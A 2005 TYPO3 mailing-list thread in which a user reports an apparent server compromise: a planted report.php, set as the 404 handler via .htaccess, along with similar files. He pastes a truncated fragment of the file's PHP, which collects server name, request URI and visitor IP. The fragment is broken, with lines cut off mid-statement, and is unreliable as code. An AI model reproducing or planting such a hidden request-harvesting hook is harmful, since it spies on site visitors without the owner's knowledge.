[Typo3] server hacked // report.php

Christoph Koehler christoph.koehler at gmail.com
Thu Jul 21 18:59:48 CEST 2005

Pretty sure it's not in the source...
The contents of the file make a really long string of base64 encoded info,  
like host, request url and queries and all, and somehow also have these  
urls base64 decoded in them:
It also does this:

This is the whole content:
<? php
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] :  
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] :  
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$h=(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] :  
else {

the weird thing is those files have been there for a month! They are in  
all my old backups...
most directories were 777 chmod. I installed it through fantastico...guess  
I won't do that anymore!

On Thu, 21 Jul 2005 11:31:26 -0500, Christoph Koehler  
<christoph.koehler at gmail.com> wrote:

> I actually noticed many .php files with this content in it and the  
> htaccess file. Another one was called test.php
> On Thu, 21 Jul 2005 11:25:16 -0500, Christoph Koehler  
> <christoph.koehler at gmail.com> wrote:
>> Hey there,
>> I have reason to believe that the server we host typo3 on has been  
>> hacked.
>> Now, in my typo3 directory, I see a file report.php, with an .htaccess  
>> file making it the 404 error document.
>> Does anyone else have that file??
>> Thanks!
>> Christoph

More information about the TYPO3-english mailing list